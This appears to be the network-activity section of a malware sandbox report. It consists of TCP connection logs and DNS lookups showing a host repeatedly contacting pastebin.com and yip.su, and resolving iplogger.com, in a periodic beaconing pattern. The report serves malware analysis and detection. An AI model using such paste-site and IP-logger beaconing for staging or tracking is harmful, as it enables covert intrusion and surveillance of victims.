                    Sep 16, 2024 21:23:28.682826042 CEST49787443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:28.683280945 CEST49787443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:28.683295012 CEST44349787104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:29.141905069 CEST44349787104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:29.143666983 CEST49787443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:29.143708944 CEST44349787104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:29.285518885 CEST44349787104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:29.285626888 CEST44349787104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:29.285676956 CEST44349787104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:29.285689116 CEST49787443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:29.285712004 CEST44349787104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:29.285751104 CEST49787443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:29.285758018 CEST44349787104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:29.285818100 CEST44349787104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:29.285866022 CEST49787443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:29.286442995 CEST49787443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:29.311032057 CEST49788443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:29.311070919 CEST44349788188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:29.311130047 CEST49788443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:29.311400890 CEST49788443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:29.311413050 CEST44349788188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:29.781692028 CEST44349788188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:29.783543110 CEST49788443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:29.783564091 CEST44349788188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:30.036614895 CEST44349788188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:30.036663055 CEST44349788188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:30.036695004 CEST44349788188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:30.036726952 CEST44349788188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:30.036752939 CEST44349788188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:30.036765099 CEST49788443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:30.036776066 CEST44349788188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:30.036788940 CEST44349788188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:30.036814928 CEST49788443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:30.036844015 CEST49788443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:30.036854029 CEST44349788188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:30.036899090 CEST44349788188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:30.036916018 CEST49788443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:30.036938906 CEST49788443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:30.037389040 CEST49788443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:34.431680918 CEST49789443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:34.431756020 CEST44349789104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:34.435739040 CEST49789443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:34.436069965 CEST49789443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:34.436103106 CEST44349789104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:34.906090021 CEST44349789104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:34.908384085 CEST49789443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:34.908444881 CEST44349789104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:35.053605080 CEST44349789104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:35.053659916 CEST44349789104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:35.053699970 CEST44349789104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:35.053726912 CEST49789443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:35.053742886 CEST44349789104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:35.053756952 CEST44349789104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:35.053800106 CEST49789443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:35.053822041 CEST44349789104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:35.053848028 CEST44349789104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:35.053878069 CEST49789443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:35.053920984 CEST49789443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:35.054591894 CEST49789443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:35.089673042 CEST49790443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:35.089703083 CEST44349790188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:35.089835882 CEST49790443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:35.090137959 CEST49790443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:35.090147018 CEST44349790188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:35.561966896 CEST44349790188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:35.567688942 CEST49790443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:35.567702055 CEST44349790188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:35.790324926 CEST44349790188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:35.790394068 CEST44349790188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:35.790450096 CEST44349790188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:35.790502071 CEST44349790188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:35.790570021 CEST44349790188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:35.790752888 CEST44349790188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:35.790795088 CEST49790443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:35.790803909 CEST44349790188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:35.790956974 CEST44349790188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:35.791682005 CEST49790443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:35.795705080 CEST49790443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:40.213725090 CEST49791443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:40.213783979 CEST44349791104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:40.215111971 CEST49791443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:40.215475082 CEST49791443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:40.215491056 CEST44349791104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:40.693576097 CEST44349791104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:40.696023941 CEST49791443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:40.696090937 CEST44349791104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:40.840800047 CEST44349791104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:40.840893030 CEST44349791104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:40.840939999 CEST44349791104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:40.840953112 CEST49791443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:40.841012001 CEST44349791104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:40.841068029 CEST49791443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:40.841187000 CEST44349791104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:40.841295004 CEST44349791104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:40.841345072 CEST49791443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:40.848093987 CEST49791443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:40.867511988 CEST49792443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:40.867569923 CEST44349792188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:40.867647886 CEST49792443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:40.867850065 CEST49792443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:40.867882013 CEST44349792188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:41.323106050 CEST44349792188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:41.324949980 CEST49792443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:41.325040102 CEST44349792188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:41.570306063 CEST44349792188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:41.570370913 CEST44349792188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:41.570416927 CEST44349792188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:41.570444107 CEST49792443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:41.570452929 CEST44349792188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:41.570467949 CEST44349792188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:41.570513964 CEST49792443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:41.570532084 CEST44349792188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:41.570648909 CEST49792443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:41.570864916 CEST44349792188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:41.571019888 CEST44349792188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:41.571227074 CEST49792443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:41.571662903 CEST49792443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:45.995229959 CEST49793443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:45.995279074 CEST44349793104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:45.995353937 CEST49793443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:45.995809078 CEST49793443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:45.995819092 CEST44349793104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:46.473253012 CEST44349793104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:46.475449085 CEST49793443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:46.475462914 CEST44349793104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:46.618557930 CEST44349793104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:46.618659973 CEST44349793104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:46.618695021 CEST44349793104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:46.618706942 CEST44349793104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:46.618721962 CEST49793443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:46.618727922 CEST44349793104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:46.618784904 CEST49793443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:46.618827105 CEST44349793104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:46.618910074 CEST49793443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:46.619525909 CEST49793443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:46.640827894 CEST49794443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:46.640914917 CEST44349794188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:46.640994072 CEST49794443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:46.641311884 CEST49794443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:46.641340971 CEST44349794188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:46.647722960 CEST49794443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:46.691456079 CEST44349794188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:47.107734919 CEST44349794188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:47.107839108 CEST49794443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:51.757401943 CEST49795443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:51.757453918 CEST44349795104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:51.757523060 CEST49795443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:51.759668112 CEST49795443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:51.759684086 CEST44349795104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:52.249360085 CEST44349795104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:52.303293943 CEST49795443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:52.356703997 CEST49795443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:52.356733084 CEST44349795104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:52.465245008 CEST44349795104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:52.465274096 CEST44349795104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:52.465291977 CEST44349795104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:52.465334892 CEST49795443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:52.465361118 CEST44349795104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:52.465432882 CEST49795443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:52.467614889 CEST44349795104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:52.467694998 CEST44349795104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:52.468010902 CEST49795443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:52.470073938 CEST49795443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:52.592185974 CEST49796443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:52.592257977 CEST44349796188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:52.592319965 CEST49796443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:52.592704058 CEST49796443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:52.592725992 CEST44349796188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:53.093197107 CEST44349796188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:53.093308926 CEST49796443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:53.095120907 CEST49796443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:53.095128059 CEST44349796188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:53.095330000 CEST44349796188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:53.096527100 CEST49796443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:53.139413118 CEST44349796188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:53.315417051 CEST44349796188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:53.315465927 CEST44349796188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:53.315510035 CEST44349796188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:53.315534115 CEST44349796188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:53.315582991 CEST44349796188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:53.315598965 CEST44349796188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:53.315648079 CEST49796443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:53.315648079 CEST49796443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:53.315669060 CEST44349796188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:53.315681934 CEST49796443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:53.315697908 CEST44349796188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:53.315741062 CEST49796443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:53.316133976 CEST49796443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:57.710608006 CEST49797443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:57.710665941 CEST44349797104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:57.710820913 CEST49797443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:57.711067915 CEST49797443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:57.711081982 CEST44349797104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:58.185219049 CEST44349797104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:58.240329027 CEST49797443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:58.240391016 CEST44349797104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:58.349973917 CEST44349797104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:58.350022078 CEST44349797104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:58.350049019 CEST44349797104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:58.350070953 CEST44349797104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:58.350109100 CEST49797443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:58.350143909 CEST44349797104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:58.350159883 CEST44349797104.20.4.235192.168.2.6
                    Sep 16, 2024 21:23:58.350178957 CEST49797443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:58.354022980 CEST49797443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:58.361983061 CEST49797443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:23:58.600851059 CEST49798443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:58.600922108 CEST44349798188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:58.600996971 CEST49798443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:58.601520061 CEST49798443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:58.601542950 CEST44349798188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:59.072278976 CEST44349798188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:59.074542046 CEST49798443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:59.074608088 CEST44349798188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:59.308525085 CEST44349798188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:59.308576107 CEST44349798188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:59.308610916 CEST44349798188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:59.308626890 CEST49798443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:59.308646917 CEST44349798188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:59.308660030 CEST44349798188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:59.308697939 CEST49798443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:59.308717966 CEST44349798188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:59.308746099 CEST44349798188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:59.308767080 CEST49798443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:59.308778048 CEST44349798188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:59.308824062 CEST49798443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:59.308831930 CEST44349798188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:59.308844090 CEST44349798188.114.97.3192.168.2.6
                    Sep 16, 2024 21:23:59.308892012 CEST49798443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:23:59.309990883 CEST49798443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:24:03.735377073 CEST49799443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:24:03.735435009 CEST44349799104.20.4.235192.168.2.6
                    Sep 16, 2024 21:24:03.735759020 CEST49799443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:24:03.736084938 CEST49799443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:24:03.736102104 CEST44349799104.20.4.235192.168.2.6
                    Sep 16, 2024 21:24:04.205214024 CEST44349799104.20.4.235192.168.2.6
                    Sep 16, 2024 21:24:04.235672951 CEST49799443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:24:04.235685110 CEST44349799104.20.4.235192.168.2.6
                    Sep 16, 2024 21:24:04.342905045 CEST44349799104.20.4.235192.168.2.6
                    Sep 16, 2024 21:24:04.342952013 CEST44349799104.20.4.235192.168.2.6
                    Sep 16, 2024 21:24:04.342984915 CEST44349799104.20.4.235192.168.2.6
                    Sep 16, 2024 21:24:04.343014956 CEST44349799104.20.4.235192.168.2.6
                    Sep 16, 2024 21:24:04.343091011 CEST44349799104.20.4.235192.168.2.6
                    Sep 16, 2024 21:24:04.343100071 CEST49799443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:24:04.343100071 CEST49799443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:24:04.344176054 CEST49799443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:24:04.355340004 CEST49799443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:24:04.575300932 CEST49800443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:24:04.575376034 CEST44349800188.114.97.3192.168.2.6
                    Sep 16, 2024 21:24:04.575449944 CEST49800443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:24:04.575809002 CEST49800443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:24:04.575820923 CEST44349800188.114.97.3192.168.2.6
                    Sep 16, 2024 21:24:05.059525013 CEST44349800188.114.97.3192.168.2.6
                    Sep 16, 2024 21:24:05.061130047 CEST49800443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:24:05.061170101 CEST44349800188.114.97.3192.168.2.6
                    Sep 16, 2024 21:24:05.294636965 CEST44349800188.114.97.3192.168.2.6
                    Sep 16, 2024 21:24:05.294696093 CEST44349800188.114.97.3192.168.2.6
                    Sep 16, 2024 21:24:05.294760942 CEST44349800188.114.97.3192.168.2.6
                    Sep 16, 2024 21:24:05.294883013 CEST49800443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:24:05.294922113 CEST44349800188.114.97.3192.168.2.6
                    Sep 16, 2024 21:24:05.294950008 CEST44349800188.114.97.3192.168.2.6
                    Sep 16, 2024 21:24:05.295032978 CEST49800443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:24:05.295140028 CEST44349800188.114.97.3192.168.2.6
                    Sep 16, 2024 21:24:05.295224905 CEST44349800188.114.97.3192.168.2.6
                    Sep 16, 2024 21:24:05.295265913 CEST49800443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:24:05.295279026 CEST44349800188.114.97.3192.168.2.6
                    Sep 16, 2024 21:24:05.295361996 CEST49800443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:24:05.295418978 CEST44349800188.114.97.3192.168.2.6
                    Sep 16, 2024 21:24:05.295552969 CEST44349800188.114.97.3192.168.2.6
                    Sep 16, 2024 21:24:05.295612097 CEST49800443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:24:05.295880079 CEST49800443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:24:09.703692913 CEST49801443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:24:09.703742981 CEST44349801104.20.4.235192.168.2.6
                    Sep 16, 2024 21:24:09.703819990 CEST49801443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:24:09.704123020 CEST49801443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:24:09.704143047 CEST44349801104.20.4.235192.168.2.6
                    Sep 16, 2024 21:24:10.199090004 CEST44349801104.20.4.235192.168.2.6
                    Sep 16, 2024 21:24:10.201262951 CEST49801443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:24:10.201297045 CEST44349801104.20.4.235192.168.2.6
                    Sep 16, 2024 21:24:10.864701986 CEST44349801104.20.4.235192.168.2.6
                    Sep 16, 2024 21:24:10.864773989 CEST44349801104.20.4.235192.168.2.6
                    Sep 16, 2024 21:24:10.864825010 CEST44349801104.20.4.235192.168.2.6
                    Sep 16, 2024 21:24:10.864866018 CEST44349801104.20.4.235192.168.2.6
                    Sep 16, 2024 21:24:10.864890099 CEST49801443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:24:10.864949942 CEST44349801104.20.4.235192.168.2.6
                    Sep 16, 2024 21:24:10.864983082 CEST49801443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:24:10.865036964 CEST44349801104.20.4.235192.168.2.6
                    Sep 16, 2024 21:24:10.865372896 CEST49801443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:24:10.866333961 CEST49801443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:24:10.912493944 CEST49802443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:24:10.912549973 CEST44349802188.114.97.3192.168.2.6
                    Sep 16, 2024 21:24:10.912666082 CEST49802443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:24:10.915047884 CEST49802443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:24:10.915060997 CEST44349802188.114.97.3192.168.2.6
                    Sep 16, 2024 21:24:11.441812038 CEST44349802188.114.97.3192.168.2.6
                    Sep 16, 2024 21:24:11.445154905 CEST49802443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:24:11.445180893 CEST44349802188.114.97.3192.168.2.6
                    Sep 16, 2024 21:24:11.682148933 CEST44349802188.114.97.3192.168.2.6
                    Sep 16, 2024 21:24:11.682198048 CEST44349802188.114.97.3192.168.2.6
                    Sep 16, 2024 21:24:11.682265043 CEST44349802188.114.97.3192.168.2.6
                    Sep 16, 2024 21:24:11.682295084 CEST44349802188.114.97.3192.168.2.6
                    Sep 16, 2024 21:24:11.682326078 CEST44349802188.114.97.3192.168.2.6
                    Sep 16, 2024 21:24:11.682346106 CEST49802443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:24:11.682363033 CEST44349802188.114.97.3192.168.2.6
                    Sep 16, 2024 21:24:11.682377100 CEST49802443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:24:11.682401896 CEST49802443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:24:11.682703018 CEST44349802188.114.97.3192.168.2.6
                    Sep 16, 2024 21:24:11.682799101 CEST44349802188.114.97.3192.168.2.6
                    Sep 16, 2024 21:24:11.683681011 CEST49802443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:24:11.828561068 CEST49802443192.168.2.6188.114.97.3
                    TimestampSource PortDest PortSource IPDest IP
                    Sep 16, 2024 21:20:09.529740095 CEST6405853192.168.2.61.1.1.1
                    Sep 16, 2024 21:20:09.536986113 CEST53640581.1.1.1192.168.2.6
                    Sep 16, 2024 21:20:10.512762070 CEST6143053192.168.2.61.1.1.1
                    Sep 16, 2024 21:20:10.669778109 CEST53614301.1.1.1192.168.2.6
                    Sep 16, 2024 21:20:33.413784981 CEST6038753192.168.2.61.1.1.1
                    Sep 16, 2024 21:20:33.421603918 CEST53603871.1.1.1192.168.2.6
                    Sep 16, 2024 21:24:09.694921017 CEST6020453192.168.2.61.1.1.1
                    Sep 16, 2024 21:24:09.702759027 CEST53602041.1.1.1192.168.2.6
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Sep 16, 2024 21:20:09.529740095 CEST192.168.2.61.1.1.10xf623Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                    Sep 16, 2024 21:20:10.512762070 CEST192.168.2.61.1.1.10xdc05Standard query (0)yip.suA (IP address)IN (0x0001)false
                    Sep 16, 2024 21:20:33.413784981 CEST192.168.2.61.1.1.10x1cc8Standard query (0)iplogger.comA (IP address)IN (0x0001)false
                    Sep 16, 2024 21:24:09.694921017 CEST192.168.2.61.1.1.10x34ddStandard query (0)pastebin.comA (IP address)IN (0x0001)false
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Sep 16, 2024 21:20:09.536986113 CEST1.1.1.1192.168.2.60xf623No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                    Sep 16, 2024 21:20:09.536986113 CEST1.1.1.1192.168.2.60xf623No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                    Sep 16, 2024 21:20:09.536986113 CEST1.1.1.1192.168.2.60xf623No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                    Sep 16, 2024 21:20:10.669778109 CEST1.1.1.1192.168.2.60xdc05No error (0)yip.su188.114.97.3A (IP address)IN (0x0001)false
                    Sep 16, 2024 21:20:10.669778109 CEST1.1.1.1192.168.2.60xdc05No error (0)yip.su188.114.96.3A (IP address)IN (0x0001)false
                    Sep 16, 2024 21:20:24.066617966 CEST1.1.1.1192.168.2.60xe82bNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                    Sep 16, 2024 21:20:24.066617966 CEST1.1.1.1192.168.2.60xe82bNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                    Sep 16, 2024 21:20:33.421603918 CEST1.1.1.1192.168.2.60x1cc8No error (0)iplogger.com104.21.76.57A (IP address)IN (0x0001)false
                    Sep 16, 2024 21:20:33.421603918 CEST1.1.1.1192.168.2.60x1cc8No error (0)iplogger.com172.67.188.178A (IP address)IN (0x0001)false
                    Sep 16, 2024 21:24:09.702759027 CEST1.1.1.1192.168.2.60x34ddNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                    Sep 16, 2024 21:24:09.702759027 CEST1.1.1.1192.168.2.60x34ddNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
